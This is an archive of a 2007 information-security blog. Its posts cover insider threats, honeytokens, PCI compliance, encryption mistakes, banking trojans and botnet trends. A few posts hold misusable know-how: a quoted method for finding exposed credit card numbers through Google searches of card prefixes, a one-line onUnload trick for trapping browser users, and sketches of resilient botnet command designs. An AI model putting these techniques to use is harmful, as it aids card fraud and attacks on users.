Monday, December 17, 2007

I'm alive!

New year, new blog. Here is my blog about information security. Still setting everything up.

Thursday, December 13, 2007

Another bot prediction that comes true

I've just read this on Network World:

Botnet-controlled Trojan robbing online bank customers

Well, take a look at my presentation in BH Europe this year (March). This was there, as well as the method being used by the malware from that article:"The Trojan has the ability to use a man-in-the-middle attack, a kind of shoulder-surfing when someone logs into a bank account. It can inject a request for a Social Security number or other information, and it's very dynamic. It’s targeted for each specific bank." (Don Jackson, SecureWorks)So, another prediction from that presentation has just been confirmed.

Thursday, November 22, 2007

New trends, new threats

I've just read about Intel's concept of "portable data centers". Living in a country where people steal ATMs, I'm already seeing cases of "stolen data centers"...as always, new trends bring new threats for us to think about.

Wednesday, November 7, 2007

Honeytokens on databases

I recently heard about David Litchfield's blog. It was a good surprise to see that he posted today a tip about how to deploy "tripwires", or "honeytokens", on databases. I understand that this kind of resource os very important to help on identifying insiders. If you manage a database for a big company, it's worth a try.

Thursday, November 1, 2007

Right on the bullseye about the insider threat

I was planning to talk about one of my favorite resources in my blogroll, Securosis. This post about the insider threat reminded me about it. Look at these remarks from Mr. Mogull and you'll not only understand this "insider threat" better but also about a very good feed to have in your blogroll:

  1. "Once an external attacker penetrates perimeter security and/or compromises a trusted user account, they become the insider threat.

  2. Thus, from a security controls perspective it often makes little sense to distinguish between the insider threat and external attackers- there are those with access to your network, and those without. Some are authorized, some aren’t.

  3. The best defenses against malicious employees are often business process controls, not security technologies.

  4. The technology cost to reduce the risks of the insider threat to levels comparable to the external threat are materially greater without business process controls.

  5. The number of potential external attackers is the population of the Earth with access to a computer. The number of potential malicious employees is no greater than the total number of employees.

  6. If you allow contractors and partners the same access to your network and resources as your employees, but fail to apply security controls to their systems, you must assume they are compromised.
  7. Detective controls with real-time alerting and an efficient incident response process are usually more effective for protecting internal systems than preventative technology controls, which more materially increase the overall business cost by interfering with business processes.

  8. Preventative controls built into the business process are more efficient than external technological preventative controls."
Number 7 highlight is mine. That's the reason why I believe that monitoring the internal network is sooooo important.

Pete Lindstrom and Linda Stutsman about "best practices"

This post from Mr. Lindstrom is very interesting. Mainly because I totally agree with him on that "there is no such thing as best practices, but I also believe there really should be such a thing". It's very hard to work on a field where you can't show that you performed well. Particularly for me, it's even worse to see very bad professionals claiming that they are selling/deploying "best practices".I also like when Mrs. Stutsman said that "There may a best practice within an industry but it's tough to go across industries". PCI-DSS is a very good example on that.Putting this and a last comment from Anton Aylward that I mentioned here together I'm starting to believe that we need to build some kind of "basics best practices". We already know pretty much about how to deal with the basics aspects of Information Security, so let's put aside those things that will always change from business to business and build something that every company can use as a way to ensure that its security doesn't sucks, at least.Using Anton's words again, "Lets worry about the baseline before we try to address the esoteric".

Tuesday, October 30, 2007

Finally something good about NAC

I usually don't give much credit to NAC articles and news on Network Computing. They are usually that old crap about new miraculous products. However, this little piece is very good.Jeff Prince explains quite well which kind of NAC implementations are worth something and which are not. Of course, looking at his signature I noticed it's from a company that sells NAC products, but I agree with his point of view on this article. After performing several security assessments I am a passionate advocate of internal LAN segregation to avoid the "M&M's" syndrome. NAC can make it quite easier.

Wednesday, October 17, 2007

Spafford and magical solutions

Eugene Spafford is one of the best minds in the infosec field. This post from him is very aligned with that other one from Anton Aylward that I mentioned here yesterday. I personally agree with a great part of what he is saying there. In a nutshell, he says that we usually spend too much time and money looking for "patch-like" solutions when we already know how to do things in the right way. A good example of that is, quoting him, "We spend huge amounts on detecting botnets and worms, and deploying firewalls to stop them, rather than constructing network-based systems with architectures that don’t support such malware.". If we look at the infosec problem as an isolated problem he is more than right. It's just like Marcus Ranum, who usually goes by a similar line.However, I believe that this approach is too technical, even simplistic. For me it's the same as saying "we already know how to produce electrical cars, so let's replace all the others by them to solve the global warming issue". There are several linked factors on these issues that we simply can't ignore. There are economical factors linked to the environmental issues, just as there are economical issues, compatibility issues, business priority issues, complexity issues, among others, linked to the infosec issue. I wonder if all problems we deal with could be so easily solved as Dr. Spafford suggests. I like to keep my mind open to "out of the box" solutions, but we can't just ignore all the linked matters when talking about security.

Tuesday, October 16, 2007

Another post on the wall

I've just read another of those posts that should be framed and hung hanged on a wall.This post from Anton Aylward is great, even with he just stating something very obvious. Super ninja risk analysis initiatives sometimes make people forget about the basics, even if the expected results of the RA is knowing that those basic things should be treated first!Some pieces of the post are very interesting, like this analogy: "So it gets to be, if you’ll pardon the analogy, like worrying over the diseases of civilization like Alzheimer’s, Osteoarthritis/Osteoporosis, ALS, Macular degeneration, diseases due to over-rich diets, Senescence in general when you don’t have a adequate diet or clean water to drink."His closing remark is also simple and perfect: "Lets worry about the baseline before we try to address the esoteric."This reminds me of a case I saw. I arrived in a place with lots of expectations about deploying risk management processes and policies, but end up starting by removing root access and providing individual accounts to system administrators, enabling logs, installing critical patches on servers and setting passwords for those pesky "sa" users.Talking about risk management at that time was the same thing as talking about healthy food habits to someone who is dying from a bleeding cut.And, just to mention, it was funny to deal with problems I mentioned above and hear from the auditors that "users should change their passwords each 30 days and not 90". :-)

Application Security and MS

It's no news that several of the best application security minds are working for MS today. This blog is a live proof of that.There is a very good post there about the first line of defense for web applications, the input validation. I'm participating in a web app development project that has a small part of code audit. I demanded during the project specification that the input validation code was the minimum part that should be verified during the process. There is a picture in that post that show exactly why, input validation problems are in the center of several types of vulnerabilities, from SQL injection to buffer overflows.The post is the first part, according to the author. I hope to see a lot more about the subject there.

Thursday, October 11, 2007

Log mining

Anton Chuvakin wrote a nice piece about a log analysis he performed on a compromised box. It was interesting to see some techniques I'm using on my work and on my master thesis. He also mentioned some experience on profiling users (the information that one week to one month is enough was very valuable to me) and some types of analysis that can be made following that concept.I'm trying to build something in that way not only based on users accounts, but also for computers, services, applications, physical locations and many other "entities". My goal is to end with a list of common situations (observables) that can be used to detect anomalies usually linked to the presence of an attacker.And sorry Dr.A, I'm planning to try that in a SIEM way instead of a log analysis approach :-)

Wednesday, October 10, 2007

Good analogy

This post in Securosis is a very good analogy and also a good piece about the limits of encryption as a security measure. I always liked physical analogies, specially those with armies and military tactics. I'm trying to read a little more about police strategies, as they seem to me as they are a very good option to compare to information security aspects.War is always simple, as you usually can see a very well defined perimeter and where the enemy is. City crime, however, is quite different. I hope to explore this a little more in the future.

Friday, October 5, 2007

Gunnar Peterson and security budget

This post from Gunnar Peterson about security budgets is extremely interesting. The comparison that he suggests between security budgets and IT budgets is a very good way to detect misconceptions about security needs and alignment between the IT strategy and the security strategy.However, it's important to mention that some network solutions can solve problems that have their root cause in other layers. It's also important to perform the comparison in a time line perspective, as you may need to invest more in a specific layer now to address a gap created by past IT investments in that layer without the related security budget.

Thursday, October 4, 2007

Killer encryption application

Rob Newby wrote a very nice piece about encryption usage. I believe the most important message there is that the focus should be on key management issues, not algorithm strength and key sizes.

Wednesday, September 26, 2007

Brazilian Bank Trojans

I jusst finished reading this paper from F-Secure regarding Bank targeting trojans. It is the first one that properly covers the Brazilian banks trojans phenomena.However, I'd like to share some comments about these two paragraphs:"Why are banking trojans so common in Brazil? Actually,malware in general is a big problem in Brazil – not justbanking trojans. Brazil has a large population of which anever-growing part is now going online. As there is a constantflow of new computer users, mass social engineering attacksare very successful in compromising users’ machines. [23]"There is an additional component, the Internet Banking scenario here in Brazil is very advanced. Several people are using IB to make almost all necessary transactions on their accounts. So, not only there are lots of bank customers who use the IB system but also it's very easy for the fraudsters to extract money from the accounts, as there are many ways to do that, from paying bills to regular funds transfer. The Brazilian banking systems allows you to electronically transfer funds from your account to any other account in any other bank immediately, so it's very easy to make it "vanish"."Banking trojans targeting Brazilian banks are typically nottargeting any banks outside the country. This is fairly natural,since the gangs making and distributing these trojans arelocal, they do not seem to have any connections tointernational criminals, and they usually come from a verypoor background. This means that crime, for them, is a way tomake an income and they do not really know that much aboutthe international banking system. Even if these gangs wouldget their hands on overseas banking credentials they wouldnot know how to use that information. [23]"There are some very well structured criminal groups using and funding the development of those trojans. The last operations from our Federal Police showed the size and complexity of them. They are probably not targeting foreign accounts because it would be harder to bring the money to Brazil after stealing it, while they still have pretty much "room for growth" on the local market.

Monday, September 24, 2007

About SIEMs and insider threats

This post is incredibly interesting for me, as I'm actively working on SIEMs, MSS for security monitoring and insider threats.What I really liked about this is that it points to some of the ideas that I like most. it mentions the company behavior with its employees and their actions as results, the misconception about the level of automation that can be reached and the need for someone behind the nuts and bolts putting intelligence in the process. That's really a nice piece.

Monday, August 27, 2007

DLP and honeytokens

Four years has passed since I coined the term "honeytoken". I talked a lot about it at that time, Lance Spitzner and others from the honeypots field too. The subject, however, hasn't been discussed extensively during the last years.Well, not until the DLP - Data Leakage Prevention - fever started. I used to perform some Google queries for "honeytoken" to know how the concept was being used, but I haven't been doing that for some months. It was a great surprise to see the results when I performed the same query today. It is obvious that honeytokens are a good way to perform some DLP functionality. I'm thinking about trying to build some kind of dynamic system to deploy and monitor them. Here is how they would work:Imagine that you want a bunch of Office sensitive files to be monitored by the system. You point the files to the system and it starts to monitor them by integrating itself to the operating system of the server where the files are hosted. When a user requests one of those files the system will dynamically generate a honeytoken and include it in the file. The system will link this honeytoken to that specific user and include it in a list of strings monitored by the main enforcement points, like Proxy servers, firewalls, IDSes and other UTM devices. It can also use some kind of distributed agent on the workstations to verify what users are doing with those files. I know that it seems to be a description of a DRM system, but the aim here is not to control what the user can do, but only to monitor the information flow.I know that there are vulnerabilities on this design, all of them were already discussed when DLP started to gain attention. However, I'd really like to see a DLP using this approach, as it wouldn't have to analyze the information, but only to look for honeytokens. They will probably be easier to deploy and faster. Is there anybody trying to do something like this?

Monday, August 20, 2007

Friday, August 3, 2007

PSI, from Secunia

I believe that the Black Hat/Defcon buzz made this slip away from the attention of the great security minds out there. Secunia has just release their PSI - Personal Security Inspector (free!).PSI acts on a problem that is incredibly dangerous: vulnerabilities on "auxiliary" software. In a certain way, the problem of vulnerabilities in Windows and Office is solved by Microsoft Update. However, almost nobody is acting to solve the vulnerabilities from software like Adobe acrobat and flash, Java virtual machines and several different media players out there. As a lot of vulnerabilities triggered by malformed data files have been disclosed during the last years, all those software pieces bring a lot of risk to the regular user.PSI can verify (using, of course, the very good DB from Secunia) lots of different software and indicate if they are updated. Actually, I regularly update the software on my desktop, and after running the tool for the first time this was the result:
So, if you are running a desktop on Windows, install PSI immediately. It will save you a huge work on keeping everything updated.

Monday, June 25, 2007

Wednesday, June 13, 2007

XML being used by malware - We said it!!!

My friend André Fucs pointed me towards this post from the McAfee Avert Labs blog. They've found a trojan controlled by XML messages. Another trend we mentioned in our Black Hat presentation. Next step, probably the signed XML messages.

Monday, June 4, 2007

Grossman on Web App Vuln Scanners

Jeremiah provides us some interesting comments on the effectiveness of Web Application security scanners for specific types of vulnerabilities. I remember when I used to perform pen tests on web applications that some things were identified in a way that it woul be very hard to achieve the same results with an automated tool. I found very interesting results with blind SQL injection and just by looking at session tokens and realizing some kind of logic behind them. Automating these things will be very hard.

We need to stop thinking that "penetration tests" can be made by some guys running automated tools. I participated on some tests with very skilled people that were able to find subtle configuration vulnerabilities that would have been missed by scanners. I also managed to find ways to jump from one server to another just by browsing through some .ini files, ASP code and so on. The results of a test like those would bring into the light some vulnerabilities that a simple scanner would never show to you, vulnerabilities on processes and procedures. Old files with important information forgetten on the server, comments on script code, just to name a few.

When looking for someone to perform a pen test, try to find those that are able to perform tests like these. You can ask them about the kind of vulnerabilities that they found during their last tests. If they just mention the lack of patches and regular SQL injection and XSS, try another one.

Tuesday, May 29, 2007

Bejtlich - versions

I really enjoyed reading this post from Richard Bejtlich. There is one piece that makes it almost perfect:

"Web 2.0: this is what is here, with more on the way -- essentially indefensible applications all running over port 80 TCP (or at least HTTP) that no developer really understands and for which no one takes responsibility"

I saw once a perfect example of this "no developer really understands". I was called on a weekend by a developer who was trying to deploy his new application into production. Obviously, the usual suspect for the problems he was facing was the firewall.

I spent almost an hour to understand not only where the application was running, but also its architecture. It end up that he wasn't aware that his web service needed a HTTP server! :-) After solving that specific problem, I scheduled some basic networking classes with that group of developers the next week. I noticed how deep they knew about Java, and other programming stuff, but they didn't have a clue about the data flow of their applications in a network perspective. Nice context to work with, specially if you you're trying to control the information flow on your network.

Phrack

like the phoenix, it's back again from the ashes. Cool.

Friday, May 25, 2007

Stration worm

There are news about the Stration Worm, which spreads itself using Skype and can migrate to other networks, like MSN and ICQ. That's very interesting, specially because it's quite aligned to what I presented on Black Hat Europe this year. Although I was talking about botnets, some of the trends apply to all kinds of malware. Now, using several communication channes is not a theoretical thing only, it's fact.

CC numbers are everywhere

This article from slashdot is very good. It's funny to see how easy it is to obtain credit card numbers. PCI still have a long way on securing this information, if this can be done after all. From the article:

"Some "script kiddie" tricks still work after all: Take the first 8 digits of a standard 16-digit credit card number. Search for them on Google in "nnnn nnnn" form. Since the 8-digit prefix of a given card number is often shared with many other cards, about 1/4 of credit card numbers in my random test, turned up pages that included other credit card numbers, and about 1 in 10 turned up a "treasure trove" of card numbers that were exposed through someone's sloppily written Web app. If the numbers were displayed along with people's names and phone numbers, sometimes I would call the users to tell them that I'd found their cards on the Internet, and many of them said that the cards were still active and that this was the first they'd heard that the numbers had been compromised."

Thursday, May 24, 2007

Risk Management - measuring all components of the equation

OK, just like when you start talking about the Relativity Theory and mention E=mc^2, we always mention RISK = Impact x Probability when talking about Risk management. And it's interesting to see how the Probability is measured. A good thread on this subject is here.

People usually calculate the probability by looking at what can be done with an specific vulnerability. However, threats need to be considered too. How many people are out there with Motives, Means and Opportunites (MMO) to explore that vulnerability?

It's interesting to see that most companies are evaluating their enviroments to check how exposed they are to specific vulnerabilities, but they are not checking in a reliable way the threat levels related to their business. Perhaps banks are the kind of companies that are closer on doing that properly, but the others seem to be a little behind.

Two things make this matter interesting for me. One is that there aren't many choices in the market if you choose to hire someone to aid you about it. The second is that too few think that they need to worry about it. What people are using out there to calculate their exposure to certain kinds of threats? Are they doing that at all? It would nice to hear from those that are doing something about it.

Wednesday, May 16, 2007

HotBot papers

I've just read two papers from the HotBots conference from Usenix. One, from Grizzard, Sharma, Nunnery, Kang and Dagon, shows an overview about p2p botnets. It's interesting to see that the authors identified exactly the same issues that we tried to solve during on our Black Hat presentation, specially the hard coded information needed by the bot to start the communication with its herder.

Another very good paper is the one from Wang, Sparks and Zou, that present the design of an advances hybrid p2p botnet. They included in their design the use of digitally signed commands, exactly like we mentioned. They minimized the problem of the hard coded bootstrap information, but it wasn't solved. With our proposed OTP scheme the botnet design from them would be a really hard thing to put down. I think we will see more developements on this subject, specially merging the concepts from all these papers. It will be something very hard to fight against.

Thursday, May 10, 2007

Power

While reading the well written "Intro to hackernomics" from Herbert Thompson on Network World, I noticed something quite interesting about threats motivation.

Thompson first law states that "most attackers aren't evil or insane; they just want something. ". Money is the natural choice for that something.

However, we can list several incidents that didn't generate any profit to the attacker. Is the first law of hackernomics wrong?

No. The mistake is thinking that the "something" wanted is always money. There is something that is pursued by Men even before the creation of currency: Power.

"Information is Power", said Robin Morgan. Nothing can be more precise than this concept today. The ubiquitous presence of information systems on today's world makes information like passwords and encryption keys huge power repositories. Can you imagine the power of those who have keys for military communication systems?

Sometimes (almost always) Power can be converted into money. Because of that some attacks motivations can be mistakenly interpreted as monetary. This possibility, however, can't be assumed as a rule. Several people are not directly interested in money, but eagerly pursue power. Terrorists and politicians are good examples.

Through this point of view we can understand why some apparently pointless things happen, like virus creation, denial of services attacks and website defacements. Script kiddies and teenage hackers are usually trying to show to their friends how powerful they are.

Acknowledging Power as a valid motivation for attackers makes several threats more feasible and understandable. It will allow better threat modelling and improve risk assessments. Different countermeasures can also be applied, focusing on reducing the power related to the target information instead of reducing the possibility of vulnerability exploitation.

Wednesday, May 9, 2007

Security Architecture Blueprint

Gunnar Peterson published a few days ago what he called "Security Architecture Blueprint". It is a blueprint of the Security Services needed to deploy a security architecture, from processes to technologies. Together with P-CSO from Mike Rothman I believe it's one of the best support materials to a CSO to use when developing a Security Plan. P-CSO will enable you to create a roadmap on a business perspective, while the blueprint from Peterson will cover all aspects on the technical side. I was happy to see that the plan that I developed a few months ago is quite aligned to it.

The Blueprint is designed in a somewhat layered approach, what really makes sense when you are trying to map high level risk management goals to processes, procedures and technology controls. The blueprint enables you to build an effective Information Security Management System without all that burden from ISO17799/27001, but in a way that you can use all the processes and tools developed to pass through a certification process on that standard, if needed.

The document is also very rich on information about security metrics, including a very good sample of an Enterprise Security Dashboard. I recommend Peterson's blueprint for all CSOs developing a security strategy and for consultants that are trying to build a comprehensive product and services portfolio.

SSL FTP on Longhorn

Fernando Cima posted on his blog about new features on Windows Longhorn, the client and server for FTP over SSL.

That's a very important feature for those fighting to improve the security of file transfers on their networks (specially those dealing with PCI-DSS). The fact of having this as native resources will make it easier to convince network and systems administrators to deploy it. Another very good improvement from MS.

Friday, May 4, 2007

Enabling business

Sometimes I catch myself defending "less secure" solutions for specific situations. It feels a little strange, but it usually happens when someone with "canned" knowledge about security tries do discuss the risks for some kind of technology, usually trying to use it as an excuse to avoid needing to work to make that thing happen. These situations would be fun if they wouldn't cause to others watching the discussion an impression that the security guy (me) doesn't know as much as the other guy about the issues he raised.

Today I saw this on the SecurityBuddha.com:

Stop Disabling and Start Enabling

If information security is to ever have an ounce of credibility in a corporate world it has to stop disabling and start enabling. The days of hiding behind thick piles of self-scribed doctrine and exercising personal dogma laced with stupid egotistical power trips based on technology religion must end. If you talk to most (yes most) folks outside of information security in an environment where this culture is allowed to exist they will usually raise an eyebrow, get their heckles up or even laugh in your face. The locker-room conversation discuss the “thought police” and ways to not tell or involve security about what’s really happening: and quite frankly I don’t blame them. Why?

Because sadly some so called security folks are nothing short of dinosaurs and I suspect exhibit many of the traits above. This article in CSOOnline prove it.

Kill instant messaging. Stop it at the desktop via security and group policies. Stop it at the gateway. Stop it at the firewall. Death to IM. My opinion: This is the best way to go if you can get away with it. If you’re running e-mail and a working phone system in a general office environment, IM is a geek-toy luxury. Simple as that.

Can you blame people? I often read things and laugh, sometimes I read them and get angry and occasionally I read things and don’t know what to say apart from “what “wibbly wobbly” planet do you live on?”

Maybe you would like to kill all cell phones as well? Lets face it they are really annoying. All those people talking and doing business while you try and read your newspaper with your drip coffee and Krispy Kreme.

Maybe that new fangled Internet thing should be shut off period? After all what’s wrong with paper and carrier pigeons?

I hope the author doesn’t work for a publicly traded company. If he does I am calling Kramer for a sell recommendation and I am serious.

As Dilbert once said ” I am not anti-business, I am anti-idiot”.


Yes, he is quite right about it! Another funny thing about blocking IM is that the request usually comes from managers that don't want their team spending time chatting. So they try to make Security block it, avoiding the direct conflict with the team. When I say that I'll do it only if the reasons are clearly stated to the users, they usually give up.

Mark Curphey raises a very important issue on the post above. When you start to be a problem and overreact on some threats people will start to avoid putting Security together in their projects, as they expect the same behavior (disabling). Try to show to the company that your role is not disabling things. Even when writing reports or providing feedback, try to replace the "can't be used" with a "can be used with security improvements". I know that sometimes even that is impossible, but don't discard it until you really sees that there is no other option.

Wednesday, May 2, 2007

Joanna and Mr. Chuvakin

Today I read a post in Anton Chuvakin's blog about a post from Joanna Rutkowska. He was caught by the "risk assessment pseudo-science", what also caught my eye on those posts. She reminds us that even if you could solve the "human factor", you still can be compromised by technical issues, like zero days.

Some might say that this is just FUD. I partially agree with that. However, I think it's extremely important to make people remember to avoid focusing on only one side of the triangle (Process, People, Technology). You should try to reduce risk from all of them. Ok, maybe you can't avoid zero days, but you must be prepared to deal with them. Reduces user privileges, network with firewalls and ACLs with a good "deny by default" approach and a good monitoring and detection process/infrastructure. Richard Bejtlich and Chuvakin are very good sources of information about that, even if each uses a different approach (Network monitoring / Logs). They are complementary.

If you still don't do that, start reading Anton Chuvakin's blog. He wasn't posting a lot for a long time, but he's back to the blogosphere with full throttle. The posts from my blogroll on the last weeks have come from him.

Monday, April 9, 2007

Two-factor authentication and Banks

Some noise is being made based on some declarations from Ross Anderson, from Cambridge University, about the Banks using two-factor authentication to fight Phishing.

I partially agree with Mr. Anderson, who says that "There are a whole bunch of things that can go wrong with two-factor authentication". He is right about it. But I believe that the two-factor authentication can work if properly deployed.

On our Black Hat presentation last month we shown how malware can beat two-factor authentication in a Bank Website. The malware doesn't need to steal credentials, it can (1) simply steal the session ID (you can be authenticating with two-factor a session that is identified by a simple HTTP cookie or URL parameter) or (2) perform the malicious transactions using the user navigation process (check our paper from the presentation).

However, some two-factor authentication devices can be used to authenticate not only the user, but the transaction itself. It's a giant leap forward, as both strategies mentioned above won't work if you include transaction authentication in the process. It's important to say that it's not just about re-authenticating the user during the transaction, but authenticating the data from the transaction too. It's very important to avoid transaction tampering. And it's not that hard, some banks are already doing it, like RaboBank in Europe and the ex-BankBoston (now ItauBank) in Brazil. They use different approaches (hardware token / software digital certificates and digital signature), but both rely on the concept of authenticating the transactions. It would be nice to compare fraud numbers from these Banks to others. I'm sure we would see very good results from their initiatives.

Thursday, April 5, 2007

Tuesday, April 3, 2007

Botnets trends

We (I, Fucs and Victor) have just made our presentation on botnets trends and threats on Black Hat Europe. The content of our presentation is available on the BH website:

Presentation
White Paper

I would like to receive feedback from the security community. Please feel free to send me any comments.

Tuesday, March 27, 2007

PCI problems

I was thinking about writing something about the problems on the PCI standard. I didn't find the time to do it, but Mark Curphey did it, and very well. I really agree with almost everything he pointed on his article.

I'm also seeing a huge distance between measured Risk and security controls when companies try to comply with PCI. Like the encryption requirements, most of the companies have worse vulnerabilities than lack of encryption, mostly when we are talking about information on databases.

The applications need to access the information, encrypted or not. So, all the necessary steps to allow the applications to access the information are there. And there are lots of things to deal with the applications, beginning with secure coding (that is covered, although not very well, by the standard) and passing through user profiles and policies to regulate their access privileges over time.

Besides that, there are many situations where exceptions from the rules are being conceded, most of them on the issuers side. There are lots of old mainframe bases systems being used, and these companies are being able to use compensatory controls over lots of requirements, as the mainframe environment is "secure". Hey, didn't these guys realize that mainframe security today is mostly being done through simple obscurity? PCI assessors are not properly verifying access privileges from people that support production environments. These guys can access lots of information. Now try to point some PCI auditors that know how to dig into details on mainframes to find about those privileges. It'll be very hard to find one.

And what about log management? Anything being done? Almost nothing.

Is the personal firewall necessary?

Again on Security Incite, Mike says that there is no need for personal firewalls anymore, as the one provided by the OS seems to be enough for most cases. I agree with him when he says that where it is not enough you'll need it from a bundle of other things, like AV and AntiSpyware. I believe we will start to see products like "endpoint security solution".

The AVs are already doing anti-spyware, the personal firewalls are doing some AV, and so on. In a near future every desktop protection product will do all this stuff, protect against "malware" and external attacks.

Corporate editions will also include NAC/NAP integration. There is no sense on installing dozens of agents to keep bad thing out, just choose a single good one to do all the job. It's also a good market trend for the companies looking for ways to survive, include all security features in a single agent and sell it as "endpoint security agent". Nice.

Path of least resistance

I was reading a comment from Mike Rothman about the need for SSL and then I found this expression, "path of least resistance". I really liked it on the context of security. There are lots of easy things to do to remove paths of least resistance. Depending on the level of exposure of your organization, this is all you may need to do to achieve a reasonable level of security. I remember several security measures that when are discussed by more technical guys seem to be not so relevant, but we can't ignore how many less savvy attackers are there trying to exploit our systems. A control that can stop 90% of them is better than nothing at all. I really prefer to deal with 10% of a threat than 100% of it. Just don't ignore that 10%. You can choose consciously to live with it, but don't ignore it.

Thursday, March 22, 2007

The Kid is growing!

Four years ago I coined the term Honeytoken while discussing how honeypots could be used my companies with Lance Spitzner. Now they made their way into "professional" publications, like Network World. Good to see that the idea is growing. I believe that honeytokens can be a very good way to implement data monitoring for PCI compliance, for example.

Posts you hang on the wall

Sometimes I see on the discussion lists some posts that I think we should "hang on the wall". Today Marcus Ranum sent two paragraphs to the log-analysis list that were so great that I'm almost printing them to put on my office wall:

"All the current trend toward legislating compliance has
accomplished is setting the bar very low, and encouraging
companies to look only at meeting that standard. I've had
senior IT managers tell me "We are going to do the exact
minimum, wherever possible."

In log analysis terms, that means that the logs to to a big
bucket which is periodically dumped into the compost
heap. Nobody'll look in the bucket until someone passes
legislation requiring people to LOOK at it. And, of course,
when that happens, they'll do the exact minimum, &c..."

Congrats Marcus, always sharp!

Tuesday, March 20, 2007

Virtualization and Security

Mr. Antonopoulos has got a point on this article for Network World. I don't think security is aligned to the business drivers that are conducting the virtualization fever. He used good examples, as the security trend towards appliances. Is it aligned to the virtualization model being used today? I don't think so.

Saturday, March 17, 2007

Cobit 4.0 and other standards

I've recently found some time to take a look at Cobit 4.0 version. I was glad to see that ISACA aligned Cobit to other documents, like ISO17799 and ITIL. It was a very important change, as the organizations will usually deploy their processes following best practices guides like ISO17799 and ITIL and will have their IT environment audited by someone using Cobit.

This will avoid that people try to use Cobit as an implementation guidance, what is definitely not the purpose of this standard. It will also force auditors to know more about the other standards as I've found in the past some auditors that suffered from "non-Cobit blindness".

Audit Quality and Freakonomics

I was recently reading the excellent documents from Ross Anderson on Information Security Economics. A good reading tip for those interested in the subject is the famous Freakonomics book.

After reading Anderson's texts I realized that the reason for the lower quality of the External Audit that I've been seeing is strictly economic. There are no incentives for an audit company to actually deliver good audits! For those who hire a big audit company the main reason is the final report, usually needed to comply with things like SOX. A "clear" report is the best thing that they can receive, as they will be compliant with regulations and won't have to spend money on solving audit issues. Naturally, audits that find less issues will be preferred by the market. Meanwhile, those companies that run more thorough audit processes will suffer the opposite effect. Is it possible to build into those regulations something to avoid it?

Saturday, March 3, 2007

Those five mistakes over encryption

Anton Chuvakin liked that I called his article on encryption mistakes a "masterpiece". But it really is!

In fact, encryption mistakes are in focus now that PCI is getting stronger. Everybody is looking for ways to encrypt card data. And it's exactly at this time that they are more vulnerable to vendors pitches. I'm seeing some "PCI in a box" products being sold, and they are usually related to encryption.

Another problem with encryption is when you're talking with vendors of other IT products besides security. Try, for example, to ask a software salesman about how his software deals with user IDs and passwords. I'm almost certain that you'll hear "relax, they are encrypted". I know that salesman aren't the best people to answer those questions, but I feel a sadistic and hard to control desire to ask "How?" (in fact, I always do that). Their answers always contain one or more of those mistakes listed by Dr. Chuvakin. My favorite ones, until now, are:

"With a 256 BYTES key and 3DES" (even if it was bits... :-) )
"Using a known secure method called RSA" (are they really encrypting passwords with RSA???)
"I can't tell you, it's so secure it's secret" (men, it's so funny to hear that!)

Now, where are the security guys from these companies? Are they working only on their corporate policies? Even if some of these cases are just a salesman trying to lure you with a bad answer, there are some of those that are really bad encryption implementations. Some software houses still don't have nobody responsible for including security in their products and development processes. This makes the work of the security departments of companies that are buying their software much more harder, as sometimes they are struggling with business people to avoid that crappy software from entering into their business. And sometimes that crappy software is the best (or even the only) solution in terms of business functionality.

Another aspect that really annoys me when I hear those answers. If those guys are saying those things to me without thinking twice, it's because someone else asked that and BOUGHT that answer. How can a CSO or something similar be satisfied with an answer like that? Encryption tends to be seen as a too technical subject for CSOs to learn about. No, they (we) need to know at least the basics about it. It's not that hard to identify those five mistakes. If you believe that a vendor already throwed something like those answers into you and you bought it, go look for a basic encryption introduction. Even by reading some pages from wikipedia you'll be able to identify most of those cases.

The CISSP body of knowledge contains all the information needed by a CSO to know the encryption basics. If you already obtained your certification or are planning to get it, take your books and read that part again with a different look. Now you know when you'll need that information.

Friday, March 2, 2007

Encryption Mistakes, masterpiece by Chuvakin

Anton Chuvakin wrote a masterpiece about the most common mistakes regarding data encryption. They are:

- Not encrypting when it's easy and accepted
- Creating your own encryption
- "Hard-coding" secrets
- Storing keys with the encrypted data
- not handling data recovery (or "where are those f* keys????")

I think that every professional responsible for PCI compliance projects needs to read it. Encryption is not that silver bullet you're looking for (in fact, I hope you're not looking for one!)

Thursday, March 1, 2007

Storm Worm and some old predictions

In 2005 I presented in CNASI conference a PoC trojan that uses the authentication from a valid web session from the user to inject it's own transactions. I showed that even some strong authentications systems could be fooled by that. I'll reproduce that code on our Black Hat presentation as part of the trends on botnets, this specific case on their "features" sets.

It was interesting to see that the Storm Worm is doing something very similar to what I showed before to inject it's content on webmail and blog systems, avoiding CAPTCHA tests. Together with content being presented by Jose Nazarion on BH DC, this is another of our predictions appearing on new malware.

Wednesday, February 28, 2007

I wanna be a Security Evangelist

A few months after mentioning on his podcast that he wanted to be a Security Evangelist, Martin McKeay was hired by StillSecure for this position. Hey security companies out there, this is my dream job too! :-)

An important thing to say, Martin made it by deserving it. Congratulations. I hope to achieve the same someday.

Monday, February 26, 2007

Features and the security point of view

The SANS ISC diary today is mentioning a javascript function present in today's browsers called onUnload(). What does it do?

The browser will execute it when the user is leaving that page. Very interesting feature, isn't it?

Well, not when you start looking with the eyes of security, as the post on the diary does. Those pop-up filled websites can prevent the user from leaving then just by executing a location=self.location when the onUnload is called. Incredibly simple and effective (at least for them). They can also pretend that the user is really leaving when it's actually not happening, giving room for a lot of phishing attacks.

This is a very good example of how a software feature can be seen when you put the Security Googles on. You need to do that every time when your developers are buiding new code. Do you have ayone thinking about the side effects of new features of your software?

A fnal remark about the onUnload() function is that it can, in fact, help on some security aspects. Just remember that almost no users leave a web application by clicking on the "Log Out" button/link. You can force the logout procedure by detecting the user leaving the website with the onUnload() function. At least a good thing for us.

Thoughts on MS Security Intelligence Report

It's old news, but just now I've found time to comment about the MS Security Intelligence Report.

Some things confirmed some of my opinions about the Brazilian security field.

First, banks here are quite more advanced on figthing phishing and malware against their clients than other contries. The report shows that password stealers and key loggers malware are a very common threat in Brazil. This is happening for years, what made our banks to migrate their online banking systems from simple password authentication to much more complex security systems. Today it will be very hard to find a bank here that is not using a different password for the debit card and for Internet services, on-screen keyboards, anti-malware plugins and OTP cards. We should really think about showing all those things on the regular security events around the world. It's funny to see that too fw people know about this.

There is information too about the use of Instant Messaging as a social engineering attack vector. Puting information leak and productivity issues aside, it shows that blocking IM seems to be not so necessary as it seemed before. If you consider that Microsoft Messenger updates can also be published by the regular patching systems (WSUS, Microsoft Update), it won't be something that really really must be forbidden. If your business like to use it, keep it working.

Another interesting data is the normalized view of Windows version with detected malware. Windows XP SP2 is responsible for only 3.7% of the cases. It clearly shows that even before Vista the last security improvements from Microsoft are having effect.

Log Injection

